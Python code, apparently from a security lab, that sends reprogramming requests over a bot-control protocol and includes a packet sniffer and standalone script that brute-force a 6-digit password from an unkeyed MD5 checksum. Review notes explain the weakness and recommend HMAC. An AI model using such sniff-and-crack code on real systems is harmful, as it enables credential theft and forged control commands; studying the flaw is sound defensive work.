def status(self, password, *subsystems):
    """Build and send an Opcode=1 request covering the named subsystems.

    Each name in ``subsystems`` is translated to its position in
    ``ReprogrammingRequest.SUBSYSTEMS``; an unknown name raises ``ValueError``
    from ``list.index`` before anything is written to the transport.

    ``InsertChecksum`` is defined outside this block.
    NOTE(review): the brute-force code elsewhere on this page assumes the
    checksum is an unkeyed MD5 over the serialized request with a 6-digit
    password in the Checksum field. If that matches InsertChecksum, one
    captured request is enough to recover the password offline; a keyed MAC
    (HMAC) with a high-entropy secret would close that gap. Confirm against
    the InsertChecksum implementation.
    """
    indices = [ReprogrammingRequest.SUBSYSTEMS.index(name) for name in subsystems]
    request = ReprogrammingRequest(
        RequestId=self.__nextId(),
        Opcode=1,
        Subsystems=indices,
        Data=[],
    )
    InsertChecksum(request, password=password)
    # Response tracking is disabled in the original:
    # self.__requests[request.RequestId] = Deferred()
    wire = request.__serialize__()
    self.transport.write(wire)
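def reprogram(self, password, subsystem, data, *additionalSubsystems):
    """Build and send an Opcode=0 request carrying one program per subsystem.

    Args:
        password: passed to ``InsertChecksum`` to compute the request checksum.
        subsystem: name of the first subsystem (looked up in
            ``ReprogrammingRequest.SUBSYSTEMS``).
        data: program for the first subsystem.
        *additionalSubsystems: further ``subsystem, data`` pairs, flattened.

    Raises:
        ValueError: if the extra arguments do not form complete pairs, or if
            a subsystem name is not in ``ReprogrammingRequest.SUBSYSTEMS``.

    NOTE(review): ``InsertChecksum`` is defined outside this block. The
    brute-force code elsewhere on this page assumes an unkeyed MD5 checksum
    seeded with a 6-digit password; if that is accurate, this request can be
    forged by anyone who observes one packet. Confirm, and prefer an HMAC
    with a high-entropy key.
    """
    if len(additionalSubsystems) % 2 != 0:
        raise ValueError(
            "Arguments to reprogram is both a subsystem and the data")
    req = ReprogrammingRequest(RequestId=self.__nextId(), Opcode=0)
    # *args arrives as a tuple, which has no pop(); slice out the
    # alternating names and programs instead of consuming it in place.
    subsystems = [subsystem]
    subsystems.extend(additionalSubsystems[0::2])
    programs = [data]
    programs.extend(additionalSubsystems[1::2])
    req.Subsystems = [
        ReprogrammingRequest.SUBSYSTEMS.index(name) for name in subsystems
    ]
    req.Data = programs
    InsertChecksum(req, password=password)
    # Response tracking is disabled in the original:
    # self.__requests[req.RequestId] = Deferred()
    self.transport.write(req.__serialize__())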
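def dataReceived(self, data):
    """Classify a sniffed packet and test 6-digit passwords against it.

    The data is first parsed as a ``ReprogrammingRequest``; if that raises,
    it is parsed as a ``ReprogrammingResponse`` instead.

    * Response: the tenth space-separated token of the raw data is written
      to the file ``serialized_data``.
    * Request: after a 0.5 s pause the file is read back and every candidate
      ``000000``..``999999`` is placed in ``packet.Checksum``; the MD5 of the
      re-serialized packet is compared with the stored value.

    Why this is feasible: the loop assumes the checksum is an unkeyed MD5
    over the packet with the password in the Checksum field, so the whole
    search is at most 10**6 hash computations. Defending the protocol means
    a keyed MAC (HMAC) with a high-entropy secret and an encrypted
    transport, not a longer PIN.

    NOTE(review): the comparison value comes from a *response* token, while
    the commented-out line in the original (``realChecksum = req.Checksum``)
    and the standalone script use the request's own checksum. Confirm which
    is intended.
    NOTE(review): ``time.sleep`` and the search loop block the caller; if
    this is an event-loop callback (the ``transport`` API suggests so), no
    other traffic is processed meanwhile.
    """
    try:
        packet, bytesUsed = ReprogrammingRequest.Deserialize(data)
        packetType = "request"
    except Exception:
        # Narrowed from a bare except so KeyboardInterrupt/SystemExit
        # are not mistaken for "this is a response".
        packet, bytesUsed = ReprogrammingResponse.Deserialize(data)
        packetType = "response"
    print("TAP received %d bytes from %s to %s, packetType: %s, checksum: %s" % (
        len(data), self.transport.getPeer(), self.transport.getHost(),
        packetType, packet.Checksum))

    if packetType == "response":
        # Position-dependent extraction: raises IndexError when the raw
        # data holds fewer than ten space-separated tokens.
        extracted = data.split(" ")[9]
        print(extracted)
        with open("serialized_data", "w") as f:
            f.write(extracted)
        print("Extracted Checksum")

    if packetType == "request":
        time.sleep(0.5)
        print("Starting")
        # Raises IOError if no response has been recorded yet.
        with open("serialized_data", "r") as f:
            realChecksum = f.read()
        # 10**6 candidates; the original upper bound of 999999 skipped the
        # last value of the 6-digit space.
        for i in range(0, 1000000):
            candidate = str(i).zfill(6)
            packet.Checksum = candidate
            testChecksum = md5.new(packet.__serialize__()).hexdigest()
            if realChecksum == testChecksum:
                print(packet.Checksum)
                print("Found password: %s" % candidate)
                break
        print("Ended")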
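from bot.common.network import ReprogrammingRequest
import md5


def crackRequestPW(msg):
    """Search the 6-digit password space for one matching msg's checksum.

    Tries ``000000``..``999999`` through ``checkPw`` and returns the first
    candidate whose recomputed MD5 equals the checksum ``msg`` arrived with,
    or ``None`` when no candidate matches.

    Side effect: ``msg.Checksum`` is overwritten by every attempt and is left
    holding the last candidate tried, not the original checksum.

    The search is bounded at 10**6 MD5 computations because the scheme being
    tested uses a short numeric secret and an unkeyed hash. A keyed MAC
    (HMAC) with a high-entropy key removes this offline guessing path.
    """
    realChecksum = msg.Checksum
    # range(999999) in the original stopped at 999998 and never tried the
    # final candidate "999999".
    for i in range(1000000):
        pw = checkPw(msg, i, realChecksum)
        if pw:
            return pw
    return None


def checkPw(msg, pwnum, realCS):
    """Return the zero-padded candidate if it reproduces realCS, else None.

    Writes the candidate into ``msg.Checksum``, serializes ``msg`` and
    compares the MD5 hex digest of the result with ``realCS``.
    """
    pw = str(pwnum).zfill(6)
    msg.Checksum = pw
    # The md5 module exists only on Python 2; hashlib.md5 is its successor.
    testChecksum = md5.new(msg.__serialize__()).hexdigest()
    if testChecksum == realCS:
        return pw
    return None


if __name__ == "__main__":
    # Captured sample request; its Checksum field carries the MD5 hex digest.
    s = "+cyberward.botinterface.ReprogrammingRequest\x031.0\x00\x06\x00\x01\x00\x00\x00\x01\x00\x02\x00\x00\x00 59a42a27f07347f94d5d9fa58fa51ba3\x00\x03\x00\x00\x04\x00\x00\x00\x05\x00\x0b\x00\x00\x00\x01H\x00\x00\x00\x01E\x00\x00\x00\x01L\x00\x00\x00\x01L\x00\x00\x00\x01O\x00\x00\x00\x01 \x00\x00\x00\x01W\x00\x00\x00\x01O\x00\x00\x00\x01R\x00\x00\x00\x01L\x00\x00\x00\x01D\x00\x06\xff]o\xb7\xd3\xd8\x8f\xf4"
    req, bytesUsed = ReprogrammingRequest.Deserialize(s)
    print(crackRequestPW(req))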